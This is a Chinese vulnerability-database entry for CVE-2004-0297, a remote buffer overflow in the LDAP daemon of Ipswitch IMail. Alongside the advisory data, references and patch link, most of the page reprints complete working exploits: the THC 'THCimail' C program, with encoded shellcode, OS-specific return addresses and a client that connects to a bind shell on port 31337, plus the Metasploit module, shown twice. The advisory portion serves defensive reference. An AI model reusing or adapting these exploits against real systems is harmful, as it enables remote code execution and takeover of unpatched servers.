CVE-2004-0297
CVSS10.0
发布时间 :2004-11-23 00:00:00
修订时间 :2008-09-10 15:25:44
NMCOEP    

[原文]Buffer overflow in the Lightweight Directory Access Protocol (LDAP) daemon (iLDAP.exe 3.9.15.10) in Ipswitch IMail Server 8.03 allows remote attackers to cause a denial of service (crash) and execute arbitrary code via an LDAP message with a large tag length.


[CNNVD]Ipswitch IMail Server LDAP守护进程远程缓冲区溢出漏洞(CNNVD-200411-149)

        
        Ipswitch IMail server是一款基于WEB的邮件解决方案。
        Ipswitch LDAP守护进程不充分检查用户提供的LDAP标记,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以LDAP守护进程进程权限在系统上执行任意指令。
        LDAP消息由包含标记的长度和内容组成,如下的标记0x02 0x03 0x0A 0x25 0xBD代表整数665,501 (0xA25BD),如果攻击者提供的长度标记过长,当程序处理时根据标记长度拷贝用户提供的数据时缺少充分边界检查,可由于如下汇编指定而导致覆盖堆栈中内存地址:
        .text:00401188 mov byte ptr [ebp+ecx+var_4], dl
        精心提交拷贝数据可能以LDAP守护进程进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:ipswitch:imail:8.0.3Ipswitch IMail 8.0.3
cpe:/a:ipswitch:imail:8.0.5Ipswitch IMail 8.0.5

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0297
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0297
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-149
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/972334
(VENDOR_ADVISORY)  CERT-VN  VU#972334
http://www.securityfocus.com/bid/9682
(VENDOR_ADVISORY)  BID  9682
http://xforce.iss.net/xforce/xfdb/15243
(VENDOR_ADVISORY)  XF  imail-ldap-tag-bo(15243)
http://www.ipswitch.com/support/imail/releases/imail_professional/im805HF2.html
(UNKNOWN)  CONFIRM  http://www.ipswitch.com/support/imail/releases/imail_professional/im805HF2.html
http://www.osvdb.org/3984
(UNKNOWN)  OSVDB  3984
http://www.idefense.com/application/poi/display?id=74
(UNKNOWN)  IDEFENSE  20040217 Ipswitch IMail LDAP Daemon Remote Buffer Overflow

- 漏洞信息

Ipswitch IMail Server LDAP守护进程远程缓冲区溢出漏洞
危急 未知
2004-11-23 00:00:00 2005-05-13 00:00:00
远程  
        
        Ipswitch IMail server是一款基于WEB的邮件解决方案。
        Ipswitch LDAP守护进程不充分检查用户提供的LDAP标记,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以LDAP守护进程进程权限在系统上执行任意指令。
        LDAP消息由包含标记的长度和内容组成,如下的标记0x02 0x03 0x0A 0x25 0xBD代表整数665,501 (0xA25BD),如果攻击者提供的长度标记过长,当程序处理时根据标记长度拷贝用户提供的数据时缺少充分边界检查,可由于如下汇编指定而导致覆盖堆栈中内存地址:
        .text:00401188 mov byte ptr [ebp+ecx+var_4], dl
        精心提交拷贝数据可能以LDAP守护进程进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Ipswitch
        --------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Ipswitch IMail 8.0.5:
        Ipswitch Hotfix im805HF2.exe
        ftp://ftp.ipswitch.com/Ipswitch/Product_Support/IMail/im805HF2.exe

- 漏洞信息 (157)

IPSwitch IMail LDAP Daemon Remote Buffer Overflow Exploit (EDBID:157)
windows remote
2004-02-27 Verified
389 Johnny Cyberpunk
N/A [点击下载]
/********************************************************/
/* THCimail 0.1 - Wind0wZ remote root exploit                                */
/* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org)                     */
/* THC PUBLIC SOURCE MATERIALS                                               */
/*                                                                                              */
/* Bug was found by idefense or some idefense slaves ;)                 */
/* http://www.idefense.com/application/poi/display?id=74&type=vuln */
/*                                                                                              */
/* compile with MS Visual C++ : cl THCimail.c                                  */
/*                                                                                              */
/* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX,    */
/* dvorak, scut, stealth, FtR and Random                                       */
/********************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>

#pragma comment(lib, "ws2_32.lib")

char *WIN2KEN = "\xc4\x2a\x02\x75";
char *WIN2KPG = "\xc4\x2a\xf9\x74";
char *WINXPSP1G = "\xfe\x63\xa1\x71";

#define jumper "\xeb\x06\x4a\x43"

char ldapshit[] = "\x30\x82\x0a\x3d\x02\x01\x01\x60\x82\x01\x36\x02\xff\xff\xff\xff\x20";

char shellcode[] =
"\x8b\x7c\x24\xfc\x83\xc7\x21\x33\xc9\xb2\x8f\x66\x81\xc1\x02"
"\x02\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\x64\xac\xf5\xe6\x8d"
"\x8a\xe3\xd6\x77\x92\x13\x51\x03\x5e\xc3\xff\x5b\x8c\x7f\xa8"
"\xaf\xaf\xbf\x87\xd8\xdc\xbd\xd0\xbc\xbd\xa1\xcb\xc3\xc3\x8e"
"\x64\x8a\x67\x76\x70\x70\x70\xd2\x0c\x62\xa5\xe5\xbf\xd6\xeb"
"\x04\x8e\x04\xcf\x83\x04\xff\x93\x22\x04\xf7\x87\x02\xd0\xb3"
"\x04\x94\x8e\x74\x04\xd4\xf7\x8e\x74\x04\xc4\x93\x8e\x76\x04"
"\xdc\xab\x8e\x75\xdc\xde\xdd\x04\xd4\xaf\x8e\x74\xbe\x46\xce"
"\xbe\x4f\x16\x04\xbb\x04\x8e\x71\x23\xbe\x4d\x5e\x6d\x0b\x4f"
"\xfa\x78\x80\x39\xca\x8a\x02\xcb\xca\x8b\xe9\xb6\x9f\xfa\x6e"
"\xe9\xbe\x9f\xd5\xd7\xd1\xd9\xdf\xdd\xa4\xc1\x9f\xce\x80\x38"
"\x83\xc5\x04\x8b\x07\x8e\x77\x80\x39\xc2\x8a\x06\xcb\x02\x57"
"\x71\xc2\x8a\xfa\x31\x71\xc2\x8b\xfb\xae\x71\xc2\xad\x02\xd2"
"\x97\xdc\x70\x5f\x06\x48\xe5\x8b\xd7\x07\xca\x8a\x0f\xca\xf8"
"\x85\x02\xd2\xfb\x0f\xe4\xa9\x9b\x66\xf7\x70\x70\x70\x06\x41"
"\xbe\x54\xdc\xdc\xdc\xdc\xd9\xc9\xd9\x70\x5f\x18\xda\xd7\xe9"
"\x06\xbf\xe5\x9f\xda\xd8\x70\xda\x5b\xc1\xd9\xd8\x70\xda\x43"
"\xdc\xda\xd8\x70\xda\x5f\x18\x02\xca\x07\xdf\x70\xda\x6b\xda"
"\xda\x70\xda\x67\x02\xcb\x8a\x83\x1b\xdc\xe7\xa1\xea\xf7\xea"
"\xe7\xd3\xec\xe2\xeb\x1b\xbe\x5d\x02\xca\x43\x1b\xd8\xd8\xd8"
"\xdc\xdc\x71\x49\x8e\x7d\xdd\x1b\x02\xca\xf7\xdf\x02\xca\x07"
"\xdf\x3e\x87\xdc\xdc\xe5\x9f\x71\x41\xdd\xdc\xdc\xdc\xda\x70"
"\xda\x63\xe5\x70\x70\xda\x6f";


void usage();
void shell(int sock);

int main(int argc, char *argv[])
{ 
unsigned int i,sock,sock2,addr,os,ver,rc,IMAILVER;
unsigned char *finalbuffer,*crapbuf1,*crapbuf2;
unsigned int IMAIL6_7=60;
unsigned int IMAIL_8=68;

struct sockaddr_in mytcp;
struct hostent * hp;
WSADATA wsaData;

printf("\nTHCimail v0.1 - Imail LDAP exploit\n");
printf("tested on Imail 6-8\n");
printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");

if(argc<4 || argc>4)
usage();

ver = (unsigned short)atoi(argv[3]); 
switch(ver)
{
case 0:
IMAILVER = IMAIL6_7;
break;
case 1:
IMAILVER = IMAIL_8;
break;
default:
printf("\nYou entered an illegal version !\n\n");
usage();
exit(-1);
}

crapbuf1 = malloc(IMAILVER);
memset(crapbuf1,'X',IMAILVER);

printf("imailver = %d\n",IMAILVER);

crapbuf2 = malloc(2220);
memset(crapbuf2,'X',2220);

finalbuffer = malloc(2650);
memset(finalbuffer,0,2650);

printf("\n[*] building buffer\n");

strcat(finalbuffer,ldapshit);

strcat(finalbuffer,crapbuf1);

strcat(finalbuffer,jumper);

os = (unsigned short)atoi(argv[2]); 
switch(os)
{
case 0:
strcat(finalbuffer,WIN2KPG);
break;
case 1:
strcat(finalbuffer,WIN2KPG);
break;
case 2:
strcat(finalbuffer,WINXPSP1G);
break;
default:
printf("\nYou entered an illegal OS !\n\n");
usage();
exit(-1);
}

strcat(finalbuffer,shellcode);
strcat(finalbuffer,crapbuf2);

if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
{
printf("WSAStartup failed !\n");
exit(-1);
}

hp = gethostbyname(argv[1]);

if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) )
{
printf("Unable to resolve %s\n",argv[1]);
exit(-1);
}

sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock)
{ 
printf("socket() error...\n");
exit(-1);
}

if (hp != NULL)
memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
else
mytcp.sin_addr.s_addr = addr;

if (hp)
mytcp.sin_family = hp->h_addrtype;
else
mytcp.sin_family = AF_INET;

mytcp.sin_port=htons(389);

printf("[*] connecting the target\n");

rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
if(rc==0)
{
send(sock,finalbuffer,2650,0);
printf("[*] Exploit send successfully ! Sleeping a while ....\n");
Sleep(1000);
}
else
printf("\nCan't connect to ldap port!\n");

if(rc==0)
{
printf("[*] Trying to get a shell\n\n");
sock2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
mytcp.sin_port = htons(31337);
rc = connect(sock2, (struct sockaddr *)&mytcp, sizeof(mytcp));
if(rc!=0)
{
printf("can't connect to port 31337 ;( maybe firewalled ...\n");
exit(-1);
}
shell(sock2);
}

shutdown(sock,1);
closesocket(sock);

free(crapbuf1);
free(crapbuf2);
free(finalbuffer); 

exit(0);
}

void usage()
{
unsigned int a;
printf("\nUsage: <Host> <OS> <Imail Version>\n");
printf("Sample: THCimail 194.44.55.56 0 1\n\n");
printf("OS:\n");
printf("0 - Windows 2000 Server english all service packs\n");
printf("1 - Windows 2000 Professional german\n");
printf("2 - Windows XP SP1 german\n\n");
printf("Imail Version:\n");
printf("0 - Imail 6+7\n");
printf("1 - Imail 8\n");
exit(0);
}

void shell(int sock)
{
int l;
char buf[1024];
struct timeval time;
unsigned long ul[2];

time.tv_sec = 1;
time.tv_usec = 0;

while (1)
{
ul[0] = 1;
ul[1] = sock;

l = select (0, (fd_set *)&ul, NULL, NULL, &time);
if(l == 1)
{ 
l = recv (sock, buf, sizeof (buf), 0);
if (l <= 0)
{
printf ("bye bye...\n");
return;
}
l = write (1, buf, l);
if (l <= 0)
{
printf ("bye bye...\n");
return;
}
}
else
{
l = read (0, buf, sizeof (buf));
if (l <= 0)
{
printf("bye bye...\n");
return;
}
l = send(sock, buf, l, 0);
if (l <= 0)
{
printf("bye bye...\n");
return;
}
}
}
}



// milw0rm.com [2004-02-27]
		

- 漏洞信息 (16824)

IMail LDAP Service Buffer Overflow (EDBID:16824)
windows remote
2010-04-30 Verified
389 metasploit
N/A [点击下载]
##
# $Id: imail_thc.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = AverageRanking

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'IMail LDAP Service Buffer Overflow',
			'Description'    => %q{
					This exploits a buffer overflow in the LDAP service that is
				part of the IMail product. This module was tested against
				version 7.10 and 8.5, both running on Windows 2000.
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2004-0297'],
					[ 'OSVDB', '3984'],
					[ 'BID', '9682'],
					[ 'URL', 'http://secunia.com/advisories/10880/'],
				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x0a\x0d\x20",
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					["Windows 2000 English",   { 'Ret' => 0x75023386 }],
					["Windows 2000 IMail 8.x", { 'Ret' => 0x1002a619 }],
				],
			'DisclosureDate' => 'Feb 17 2004',
			'DefaultTarget' => 0))

		register_options(
			[
				Opt::RPORT(389)
			], self.class)
	end

	def exploit
		connect

		buf = "\x30\x82\x0a\x3d\x02\x01\x01\x60\x82\x01\x36\x02\xff\xff\xff\xff\x20"
		buf << "\xcc" * 5000

		# Universal exploit, targets 6.x, 7.x, and 8.x at once ;)
		# Thanks for johnny cyberpunk for 6/7 vs 8 diffs

		buf[77, 4] = "\xeb\x06"
		buf[81, 4] = [target.ret].pack('V') # 6.x, 7.x
		buf[85, 4] = "\xeb\x06"
		buf[89, 4] = [target.ret].pack('V') # 8.x
		buf[93, payload.encoded.length] = payload.encoded

		sock.put(buf)

		handler
		disconnect
	end

end
		

- 漏洞信息 (F83017)

IMail LDAP Service Buffer Overflow (PacketStormID:F83017)
2009-11-26 00:00:00
H D Moore  metasploit.com
exploit,overflow
windows,2k
CVE-2004-0297
[点击下载]

This exploits a buffer overflow in the LDAP service that is part of the IMail product. This Metasploit module was tested against version 7.10 and 8.5, both running on Windows 2000.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'IMail LDAP Service Buffer Overflow',
			'Description'    => %q{
				This exploits a buffer overflow in the LDAP service that is
				part of the IMail product. This module was tested against
				version 7.10 and 8.5, both running on Windows 2000.
					
			},
			'Author'         => [ 'hdm' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     =>
				[
					[ 'CVE', '2004-0297'],
					[ 'OSVDB', '3984'],
					[ 'BID', '9682'],
					[ 'URL', 'http://secunia.com/advisories/10880/'],

				],
			'Privileged'     => false,
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00\x0a\x0d\x20",

				},
			'Platform'       => 'win',
			'Targets'        => 
				[

					["Windows 2000 English",   { 'Ret' => 0x75023386 }],
					["Windows 2000 IMail 8.x", { 'Ret' => 0x1002a619 }],
				],
			'DisclosureDate' => 'Feb 17 2004',
			'DefaultTarget' => 0))
			
			register_options(
				[
					Opt::RPORT(389)
				], self.class)
	end

	def exploit
		connect
		
		buf = "\x30\x82\x0a\x3d\x02\x01\x01\x60\x82\x01\x36\x02\xff\xff\xff\xff\x20"
		buf << "\xcc" * 5000
		
		# Universal exploit, targets 6.x, 7.x, and 8.x at once ;)
		# Thanks for johnny cyberpunk for 6/7 vs 8 diffs		
		
		buf[77, 4] = "\xeb\x06"
		buf[81, 4] = [target.ret].pack('V') # 6.x, 7.x
		buf[85, 4] = "\xeb\x06"
		buf[89, 4] = [target.ret].pack('V') # 8.x
		buf[93, payload.encoded.length] = payload.encoded
		
		sock.put(buf)
		
		handler
		disconnect
	end

end
    

- 漏洞信息

3984
Ipswitch IMail LDAP Large Tag Overflow
Remote / Network Access Denial of Service, Input Manipulation
Loss of Integrity Upgrade
Exploit Public, Exploit Commercial

- 漏洞描述

Ipswitch IMail contains a flaw that allows a remote attacker execute arbitrary code or cause a denial of service. The issue is due to the Lightweight Directory Access Protocol (LDAP) daemon not properly sanitizing input of LDAP messages. If an attacker supplies such a message with an overly large tag, they may be able to crash the service or execute arbitrary code.

- 时间线

2004-02-17 2003-10-31
2004-02-17 Unknow

- 解决方案

Upgrade to version 8.05 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站